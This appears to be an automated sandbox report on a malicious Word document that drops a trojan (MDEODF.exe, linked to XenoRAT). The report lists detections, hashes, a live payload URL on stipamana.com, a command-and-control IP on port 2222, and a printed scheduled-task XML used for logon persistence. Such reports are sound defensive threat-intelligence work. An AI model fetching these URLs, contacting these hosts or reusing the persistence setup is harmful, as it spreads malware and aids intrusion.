                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                      Process Injection
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569823 Sample: yIla7SeJ6r.doc Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Antivirus detection for URL or domain 2->74 76 23 other signatures 2->76 9 WINWORD.EXE 345 35 2->9         started        14 taskeng.exe 1 2->14         started        process3 dnsIp4 60 www.stipamana.com 87.121.86.205, 443, 49161 SKATTV-ASBG Bulgaria 9->60 50 C:\Users\user\AppData\Roaming\...\MDEODF.exe, PE32 9->50 dropped 52 C:\Users\user\AppData\...\brtyhdrh[1].exe, PE32 9->52 dropped 54 C:\Users\...\~WRD0000.tmp:Zone.Identifier, ASCII 9->54 dropped 56 2 other malicious files 9->56 dropped 84 Document exploit detected (creates forbidden files) 9->84 16 MDEODF.exe 9->16         started        19 MDEODF.exe 14->19         started        file5 signatures6 process7 signatures8 62 Multi AV Scanner detection for dropped file 16->62 64 Machine Learning detection for dropped file 16->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 16->66 21 MDEODF.exe 3 16->21         started        24 MDEODF.exe 5 16->24         started        27 MDEODF.exe 16->27         started        68 Injects a PE file into a foreign processes 19->68 29 MDEODF.exe 19->29         started        31 MDEODF.exe 19->31         started        33 MDEODF.exe 19->33         started        process9 dnsIp10 46 C:\Users\user\AppData\Roaming\...\MDEODF.exe, PE32 21->46 dropped 35 MDEODF.exe 21->35         started        58 87.120.120.27, 2222, 49162, 49163 UNACS-AS-BG8000BurgasBG Bulgaria 24->58 48 C:\Users\user\AppData\Local\...\tmp6A67.tmp, ASCII 24->48 dropped 38 schtasks.exe 24->38         started        file11 process12 signatures13 78 Multi AV Scanner detection for dropped file 35->78 80 Machine Learning detection for dropped file 35->80 82 Injects a PE file into a foreign processes 35->82 40 MDEODF.exe 2 35->40         started        42 MDEODF.exe 2 35->42         started        44 MDEODF.exe 2 35->44         started        process14

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      yIla7SeJ6r.doc100%AviraHEUR/Macro.Downloader.MRDO.Gen
                      yIla7SeJ6r.doc100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\Desktop\~WRD0000.tmp100%AviraHEUR/Macro.Downloader.PBJD.Gen
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe100%Joe Sandbox ML
                      C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exe47%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe47%ReversingLabsWin32.Trojan.Generic
                      C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exe47%ReversingLabsWin32.Trojan.Generic
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exe100%Avira URL Cloudmalware
                      87.120.120.270%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.stipamana.com
                      87.121.86.205
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        87.120.120.27true
                        • Avira URL Cloud: safe
                        unknown
                        https://www.stipamana.com/sedtryerytsrtyuerthreytwsytysrerter/zgdargaregwaerwgsergtseggs/dfghsgthwstrsrthtghtgh/brtyhdrh.exetrue
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        87.120.120.27
                        unknownBulgaria
                        25206UNACS-AS-BG8000BurgasBGtrue
                        87.121.86.205
                        www.stipamana.comBulgaria
                        34577SKATTV-ASBGfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1569823
                        Start date and time:2024-12-06 10:28:50 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 3s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:23
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • GSI enabled (VBA)
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:yIla7SeJ6r.doc
                        renamed because original name is a hash value
                        Original Sample Name:26973056c194b68b10d1c2b9a632a27e.doc
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winDOC@28/17@1/2
                        EGA Information:
                        • Successful, ratio: 36.4%
                        HCA Information:
                        • Successful, ratio: 95%
                        • Number of executed functions: 179
                        • Number of non-executed functions: 2
                        Cookbook Comments:
                        • Found application associated with file extension: .doc
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Found warning dialog
                        • Click Ok
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                        • Execution Graph export aborted for target MDEODF.exe, PID 3216 because it is empty
                        • Execution Graph export aborted for target MDEODF.exe, PID 3320 because it is empty
                        • Execution Graph export aborted for target MDEODF.exe, PID 3812 because it is empty
                        • Execution Graph export aborted for target MDEODF.exe, PID 3948 because it is empty
                        • Execution Graph export aborted for target MDEODF.exe, PID 3964 because it is empty
                        • Execution Graph export aborted for target MDEODF.exe, PID 3996 because it is empty
                        • Execution Graph export aborted for target MDEODF.exe, PID 976 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: yIla7SeJ6r.doc
                        TimeTypeDescription
                        01:29:55Task SchedulerRun new task: mrec path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                        04:29:50API Interceptor1108x Sleep call for process: MDEODF.exe modified
                        04:29:54API Interceptor3x Sleep call for process: schtasks.exe modified
                        04:29:55API Interceptor231x Sleep call for process: taskeng.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        87.120.120.27gjot5vxpIC.exeGet hashmaliciousXenoRATBrowse
                          87.121.86.205Outstanding_Payment.vbsGet hashmaliciousUnknownBrowse
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            www.stipamana.comOutstanding_Payment.vbsGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            Pago.docGet hashmaliciousLokibotBrowse
                            • 45.149.241.168
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            SKATTV-ASBGOutstanding_Payment.vbsGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                            • 87.121.86.105
                            RHxJqGoGFB.exeGet hashmaliciousSalityBrowse
                            • 94.156.127.59
                            yVVZdG2NJX.exeGet hashmaliciousGuLoaderBrowse
                            • 87.121.86.8
                            https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                            • 87.121.86.72
                            http://cl4ycra.hgzcbqsqumhkfshql.com/kxosbfkveGet hashmaliciousUnknownBrowse
                            • 87.121.86.72
                            [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                            • 87.121.86.72
                            o4QEzeCniw.exeGet hashmaliciousUnknownBrowse
                            • 87.120.237.130
                            Payment Order #00004647.exeGet hashmaliciousXWormBrowse
                            • 87.121.86.8
                            https://www.google.pl/url?url=http://msulrmrdjzsckgcdargfhi.com&nbq=tspwcyd&idbzok=wua&nbnak=ambmgo&lwf=vngmsem&q=amp/jdsra7r.ldn%C2%ADf%C2%ADpwlywydkjq%C2%ADuh%C2%ADf%C2%ADx%C2%AD.com/ufpd3kprb&xssr=zrcbvya&bhrswcv=abqvczic&clvu=wotwqzi&umasmoc=lhibfmio&tgek=sdcrupi&bpcjeel=qvmnlgnn&eign=czorcvw&txcfkja=lhtluzhk&zkmb=joyrkbk&mspp=frbfplx&ohrxtnn=emgsiphv&cbqf=eyyxrom&ngreupz=nzdjgaue&xtpz=fvqzpcq&spvwwuv=vijpphwi&wrjj=pklwpte&uuahvww=saaddjqzGet hashmaliciousUnknownBrowse
                            • 87.121.86.72
                            UNACS-AS-BG8000BurgasBGgjot5vxpIC.exeGet hashmaliciousXenoRATBrowse
                            • 87.120.120.27
                            file.exeGet hashmaliciousAmadey, AsyncRAT, Stealc, VidarBrowse
                            • 87.120.125.31
                            po4877383.exeGet hashmaliciousRedLineBrowse
                            • 87.120.120.86
                            e824975.htmlGet hashmaliciousUnknownBrowse
                            • 87.120.114.172
                            qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                            • 87.120.125.217
                            RFQ LIST 767655776478637584637865763478634365634444444444444444453.exeGet hashmaliciousGuLoaderBrowse
                            • 87.120.114.159
                            New listed items 7648767856387547354734567465647568487.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                            • 87.120.114.159
                            file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                            • 87.120.113.179
                            https://www.google.co.kr/url?url=https://hrtyuytitwagtxswxzqxpcm&jtdm=hjstxxb&qhwocq=elw&vrszx=mrursi&rtz=qksmlok&sdyxm=kxlpun&hnkj=iujyvng&vochgqf=ylsd&pkhfd=vyifcj&nymdhak=ffn&ylzv=xpddvxaj&zoadnebgoj=rccejsmuqd&q=amp/hmf1bnz.s%C2%ADlf%C2%ADpg%C2%ADq%C2%ADq%C2%ADwzu%C2%ADx%C2%ADppns%C2%ADc%C2%ADs%C2%AD.com%E2%80%8B/n7brnx1iy&lbgq=ihcrvpx&isffrcc=xjcvvbbd&hokv=buitobfj&nfzezydbgm=lhtjhglyxx&pjwu=tdsgcse&cesnzrb=ekoykarj&ifpv=yabmwecd&acyeqkflup=bacwibnnwl&dovx=vqvcdxk&rwbvdtj=khlezois&efgx=ktfpexjt&iqggbgjmwh=cvqmvfdelx&gqsh=ghsdgye&hipceti=hpqeesqk&hkvbucxuvo=drwoirzwsq&dril=qbpemxo&xziwtam=tdvywqlj&nndiwyldry=kjqbehmdbj&kqef=faiqetj&peigggc=vbyfdxky&fstmbbtmkx=rjxugltfmc&rpws=borxqez&rijvxqj=ntedqhtd&wohxxxgtmq=jpiozpkrbp&cxah=gcmtksp&tzidqah=syxnwioo&szzishkfke=xmnmodwwoc&xmif=xdxtrqz&ajzcojq=fmtqkshw&gkmh=vmwdknp&xvlhpuf=zkhqqziq&rvfh=igbqint&gdnzlky=hyzlhjke&dqkq=ophpttl&yoamsuz=cuykisoc&frzr=lajcnwi&chdmjpw=hymhkhbw&wnxy=zwkomqb&duxkrfq=asjrwcgu&fzya=hrpcnke&hxrusxm=foudbois&yqgm=uhfvxoo&uynyplq=iryzkatx&qfzs=stmleud&vkbxzkf=hxgbjzit&dnro=vjxntck&kfrldgj=vpyfihbn&nsko=sdzidzb&unudtuz=mnvrwokv&lisf=zxdfari&tdyzrah=otrtzuun&rfza=trokalr&vkfduyc=wpwvnxpe&jjsq=pgkbofh&uatnbjp=gtwiypfq&zilu=kagobvs&jqfufkw=bckrzetp&tjng=jgmmmod&fvdtpsk=vlyzfjep&mgoi=fklhysh&llyljdv=jxpogtdn&gcjv=vjlzkuf&erlhvti=peuprtov&kbxk=jviffkg&lklbxhl=uhzpnzfw&upaw=gfmiehp&ismxijp=hmwbsmgj&zdkc=kodikna&njllvzf=oodglyrw&urdk=cktezyn&vmqhwgh=kqcbhffu&riqy=tlnbqzr&nmlgrkn=inyeynzg&vebu=pwpghzr&ckpmyoc=tmeufjen&otic=svrqsdo&tbwzubGet hashmaliciousUnknownBrowse
                            • 87.120.114.172
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            7dcce5b76c8b17472d024758970a406bFR65 380 071 464.docxGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            Pago.docGet hashmaliciousLokibotBrowse
                            • 87.121.86.205
                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                            • 87.121.86.205
                            Pago.docGet hashmaliciousLokibotBrowse
                            • 87.121.86.205
                            Amoxycillin Trihydrate Powder.docx.docGet hashmaliciousRemcosBrowse
                            • 87.121.86.205
                            #U041f#U043b#U0430#U0449#U0430#U043d#U0435.docxGet hashmaliciousRemcosBrowse
                            • 87.121.86.205
                            Structural_Design_Proposal.docx.docGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            captcha.htaGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            4z0JKnfc8L.xlsxGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            MOaSkQR8WU.xlsxGet hashmaliciousUnknownBrowse
                            • 87.121.86.205
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\brtyhdrh[1].exegjot5vxpIC.exeGet hashmaliciousXenoRATBrowse
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exegjot5vxpIC.exeGet hashmaliciousXenoRATBrowse
                                C:\Users\user\AppData\Roaming\UpdateManager\MDEODF.exegjot5vxpIC.exeGet hashmaliciousXenoRATBrowse
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):169984
                                  Entropy (8bit):7.755998218282918
                                  Encrypted:false
                                  SSDEEP:3072:XdkwdXAqPEHTJJuVqhHjFV2xEEbh9pKP2qYCp65nTGsAeXy0fkd:XmwBAQeVmWHHePH02qYCp6NGsAeXy9d
                                  MD5:F44302503EA4EEDFA831C25711DF51B7
                                  SHA1:127D6EC83904DE48D90C293E53C905FC4206BFB8
                                  SHA-256:21B7B8656A008AD3E5DF1725CDDF55E650812C1F3D59609F14C0D3089A886DE6
                                  SHA-512:71E9512244D864B53ABF436B496A53E6771135CC7D5FC0E4DF7D04AC23074B6ED1E7438A28BC232A70F57DE97367F0E3A21925BED738C5E47BDF3487AB2F4E03
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: ReversingLabs, Detection: 47%
                                  Joe Sandbox View:
                                  • Filename: gjot5vxpIC.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Rg................................. ........@.. ....................................`.................................X...S.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........G...V...........................................................N5.WSS...Yf...W.k....R.qpP.....g.,R.........;I) ...`.5.8S...hP.B._I...'...&.^...M.*.kA}........'..9.....Y!>"....o.4!....0......]u...G.#].1.Y.\.N..\.N.m...|t.y.........*..._......7..T&.x......9...oZ..q.^.%...AE.}..$...T...?-....`........".K.5........')...k.DW.q....-r._D.....9.=..&."....'.L'..j.\...MO.c.;.9..|......+H0!...H ...Q....=C.)..n.d....~....6......\.H...I!...5.3..5b..R
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):23040
                                  Entropy (8bit):5.203625381779583
                                  Encrypted:false
                                  SSDEEP:192:mtuZ/RHSmafzwXawd8/jNVf5Ajv0WWBDrTJNppT0jAOQkf:mt6/5SrzyjkjvhEGzpt0jAx
                                  MD5:9E62AFB9002305C9D9772ABB3DDBDEFB
                                  SHA1:456AA3F7296365EB7FB05FC505D13235822147E9
                                  SHA-256:F7693595A854E59BD69F8133111F78C51E57DD9B50B8F3D8A1167C9AD4734D79
                                  SHA-512:E5830CCE385CB7A2DCBA4F67D5C5736C2808C68625ACD898C3E5A266D9A720C1C8E15A4CF7C8D7CADF6754DF81C1EE4F7DAB532BB8D52903822A8F1AC1AE96BB
                                  Malicious:false
                                  Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................+...........*........................................................................................................................................... ...........................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1024
                                  Entropy (8bit):0.05390218305374581
                                  Encrypted:false
                                  SSDEEP:3:ol3lYdn:4Wn
                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):1055
                                  Entropy (8bit):3.897047042709015
                                  Encrypted:false
                                  SSDEEP:12:FLJ+DW2SFFkFmMMLGId1L6AEJl7XpShhJKShe/Q0QK1++EHSuVPoldxv3n:FLJ+S3Mmd1L6ztMhEMOQ0Q+5uVqxvn
                                  MD5:6945121BDCFC1DA5E63298A232BA8070
                                  SHA1:CFA8B949E1C52A1869BC86CDD45AF624E7E3B81C
                                  SHA-256:7F94A998F6790624169C23B6B8CD5F55DD9D4722F052B1FC22075593B8A373CB
                                  SHA-512:66A9ABC648CB79FAD282AF2A593D8FE2954F353EEA01D1730699204275EC77B2B0D9F0CDAC33A9E257913202AC48904C018911BCC0A0984AA22D9B828B0548C9
                                  Malicious:true
                                  Preview:. <Task xmlns='http://schemas.microsoft.com/windows/2004/02/mit/task'>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id='Author'>. <LogonType>InteractiveToken</LogonType>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. </Settings>. <Actions>. <Exec>. <Command>C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\MDEODF.exe</Command>. </Exe
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Generic INItialization configuration [folders]
                                  Category:dropped
                                  Size (bytes):54
                                  Entropy (8bit):4.564801159450685
                                  Encrypted:false
                                  SSDEEP:3:M1d4Kxru4om4FJyKxru4ov:MMc64Rc64y
                                  MD5:3C04C1B4545BF32347FCF8083CEB8A94
                                  SHA1:DD273BF7E26C3B3D81AB03367A4BE8D4436FCA0A
                                  SHA-256:478CFF52B227E4CB03EA33113204509CD3B44AFB72C9D7E51025C703418F1BB6
                                  SHA-512:7BD8B23E56555D28CE8A0C0487E084A46501A1E1965834E6D9959E217BDB52308EAA2075C081E63179A28ED4072E8173D1273AE4E4D2CB05B7D16E9C5B6634DA
                                  Malicious:false
                                  Preview:[doc]..yIla7SeJ6r.LNK=0..[folders]..yIla7SeJ6r.LNK=0..
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Fri Dec 6 08:29:42 2024, length=51200, window=hide
                                  Category:dropped
                                  Size (bytes):1014
                                  Entropy (8bit):4.527932343860956
                                  Encrypted:false
                                  SSDEEP:12:8tr8FgXg/XAlCPCHaXJzBAnB/5YXX+WgdgcuoNrdnicvbsa9evd5DtZ3YilMMEpz:8+/XTJi4XBukeh9IrDv3qNA57u
                                  MD5:547ADF3AA2F9AFAF2788E56E80F4A258
                                  SHA1:B70FC7AC3856C22AFD70BAAC3C56064018642110
                                  SHA-256:585ADC478354C1F0163BA942C52F3363F41C740272170E92C1D354A790A21B8A
                                  SHA-512:F76676DA40F68D7517AC9CDB029FDCA07BB5CFAB7F32A6F9EED17F5198CBEB00884B86EF2D786EEDC6DC768D8F1111D84F7E565F107D2AF9F3B2482C326F46E6
                                  Malicious:false
                                  Preview:L..................F.... .....X.r.....X.r......a.G...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Y.K..user.8......QK.X.Y.K*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2......Y.K .YILA7S~1.DOC..J.......WD..WD.*.........................y.I.l.a.7.S.e.J.6.r...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\813848\Users.user\Desktop\yIla7SeJ6r.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.y.I.l.a.7.S.e.J.6.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......813848..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):162
                                  Entropy (8bit):2.4797606462020307
                                  Encrypted:false
                                  SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                  MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                  SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                  SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                  SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                  Malicious:false
                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                  Category:dropped
                                  Size (bytes):2
                                  Entropy (8bit):1.0
                                  Encrypted:false
                                  SSDEEP:3:Qn:Qn
                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                  Malicious:false
                                  Preview:..
